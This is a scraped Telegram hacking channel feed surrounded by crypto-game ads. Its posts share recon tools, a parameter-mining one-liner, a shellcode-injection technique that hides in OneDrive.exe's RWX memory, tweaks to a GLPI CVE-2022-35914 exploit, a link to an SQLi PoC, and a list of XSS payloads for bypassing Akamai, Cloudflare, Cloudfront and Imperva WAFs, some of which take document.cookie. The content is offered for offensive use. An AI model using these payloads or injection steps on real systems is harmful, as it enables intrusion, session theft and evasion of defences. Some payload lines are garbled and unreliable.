A3l3_KA4 ?

Description
A3l3_KA4 ?
New anything about hack and Security
WebHacking, Payload, Bypass, Sql Injection , Xss, Tools &.... ?
Advertising
We recommend to visit

Community chat: https://t.me/hamster_kombat_chat_2

Twitter: x.com/hamster_kombat

YouTube: https://www.youtube.com/@HamsterKombat_Official

Bot: https://t.me/hamster_kombat_bot
Game: https://t.me/hamster_kombat_bot/

Last updated 4 months ago

Your easy, fun crypto trading app for buying and trading any crypto on the market.

📱 App: @Blum
🆘 Help: @BlumSupport
ℹ️ Chat: @BlumCrypto_Chat

Last updated 3 months, 3 weeks ago

Turn your endless taps into a financial tool.
Join @tapswap_bot


Collaboration - @taping_Guru

Last updated 6 days, 1 hour ago

7 months ago
ایردراپ جدید Seed با تفاوت اینکه …

ایردراپ جدید Seed با تفاوت اینکه کلیکی نیست بر مبنای زمانه ، فقط هر چند ساعت بیاید داخلش claim کنید ?

@seed_coin_bot

7 months, 2 weeks ago
***?*** **paramspider** ***?***

? paramspider ?

?
paramspider allows you to fetch URLs related to any domain or a list of domains from Wayback achives. It filters out "boring" URLs, allowing you to focus on the ones that matter the most.

*? *Installation:

cd paramspider pip install .

*? *Usage:

paramspider \-d example.com

*? *Examples:
⚪️ Discover URLs for a single domain:
paramspider \-d example.com
⚪️ Discover URLs for multiple domains from a file:
paramspider \-l domains.txt
⚪️ Stream URLs on the termial:
paramspider \-d example.com \-s
⚪️ Set up web request proxy:
paramspider \-d example.com \-\-proxy '127.0.0.1:7890'
⚪️ Adding a placeholder for URL parameter values (default: "FUZZ"):
paramspider \-d example.com \-p '"><h1>reflection</h1>'

? Github

⬇️ Download
? A3l3_KA4

#osint #fuzzing #BugBounty

? T.me/BugCod3
? T.me/A3l3_KA4

7 months, 2 weeks ago

Param Mining

echo "target" | gau | sort \-u | xargs \-P 1 \-I {} sh \-c 'echo "param mining => {}" && arjun \-u "{}" \-m HEADERS' echo "target" | gau | sort \-u | xargs \-P 1 \-I {} sh \-c 'echo "param mining => {}" && arjun \-u "{}" \-m POST'

#Mine #Param #BugBounty #Tips

? T.me/BugCod3
? T.me/A3l3_KA4

7 months, 2 weeks ago

RWX_MEMEORY_HUNT_AND_INJECTION_DV

?
Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling CreateRemoteThread, NtCreateRemoteThread or Direct calls.

*? *Usage:
Just compile the program and run the (EXE) without any paremeter.

*? *Steps:
⚪️ Find the OneDrive.exe in running processes.
⚪️ Get the handle of OneDrive.exe.
⚪️ Query remote process memory information.
⚪️ look for RWX memory regions.
⚪️ Write shellcode into found region of OneDrive.exe
⚪️ Fork OneDrive.exe into a new process.
⚪️ Set the forked process's start address to the cloned shellcode.
⚪️ Terminate the cloned process after execution

DEMO

? Github

⬇️ Download
? A3l3_KA4

#ShellCode #Malware

? T.me/BugCod3
? T.me/LearnExploit
? T.me/A3l3_KA4

7 months, 3 weeks ago

CVE-2022-35914 - GLPI htmlawed

How to exploit

لینک لابراتورش

لینک اکسپلویت

تو قسمت فایل پایتون این رو مد نظر بگیرین
def exploit(url,cmd,user_agent,check,hook):
    uri = "/vendor/htmlawed/htmlawed/htmLawedTest.php"

یکی از بچه ها تبدیلش کرده به :
def exploit(url,cmd,user_agent,check,hook):
    uri = "/htmLawedTest.php"

Ilya ely ?

#Exploit #Cve
——————‌
@A3l3_KA4 ?

Mayfly

GLPI htmlawed (CVE-2022-35914)

Yes another pentester blog..

7 months, 3 weeks ago

XSS WAF BYPASS PAYLOADS ?

Akamai WAf:
';k='e'%0Atop'al'+k+'rt'//
'">'ale'%2B'rt'>

CloudFlare WAf:
1337>


klzzwxh:00080000000040document.cookie)>

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
X55.is OnLoad%0C=import(Src)>

Cloudfront Waf:
">'>


6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/'al'%2b'ert';//
">%0D%0A%0D%0A

Mod security:

Imperva Waf:
X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//

[\#XSS](?q=%23XSS) [\#BYPASS](?q=%23BYPASS) [\#PAYLOAD](?q=%23PAYLOAD) ——————‌ [@A3l3\_KA4](https://t.me/A3l3_KA4) ***?***
7 months, 3 weeks ago
**Omnisci3nt**

Omnisci3nt

Omnisci3nt equips users with a comprehensive toolkit for conducting web reconnaissance with precision and efficiency.

?
Omnisci3nt is a powerful web reconnaissance tool designed to unravel the concealed intricacies of the online realm. With a comprehensive array of capabilities, Omnisci3nt offers users the means to delve into various aspects of a target domain, including IP lookup, domain information, SSL certificate details, DNS enumeration, subdomain enumeration, port scanning, web crawling, analysis of technologies utilized, Wayback Machine exploration, DMARC record examination, social media link discovery, and more.
Whether you're a cybersecurity professional, researcher, or individual seeking to gain insights into a particular domain, Omnisci3nt's versatile toolkit offers a comprehensive solution for navigating the intricate landscape of the web.

*? *Installation:

cd omnisci3nt pip3 install \-r requirements.txt python3 omnisci3nt.py

? Github

⬇️ Download
? A3l3_KA4

#Osint #Whois #Pentest #Tools

? T.me/BugCod3
? T.me/A3l3_KA4

7 months, 3 weeks ago
A3l3_KA4 ?
7 months, 3 weeks ago
**CVE-2024-32640 - Automated SQLi Exploitation PoC**

CVE-2024-32640 - Automated SQLi Exploitation PoC

Github

#cve #Exploit #Poc
——————‌
@A3l3_KA4 ?

We recommend to visit

Community chat: https://t.me/hamster_kombat_chat_2

Twitter: x.com/hamster_kombat

YouTube: https://www.youtube.com/@HamsterKombat_Official

Bot: https://t.me/hamster_kombat_bot
Game: https://t.me/hamster_kombat_bot/

Last updated 4 months ago

Your easy, fun crypto trading app for buying and trading any crypto on the market.

📱 App: @Blum
🆘 Help: @BlumSupport
ℹ️ Chat: @BlumCrypto_Chat

Last updated 3 months, 3 weeks ago

Turn your endless taps into a financial tool.
Join @tapswap_bot


Collaboration - @taping_Guru

Last updated 6 days, 1 hour ago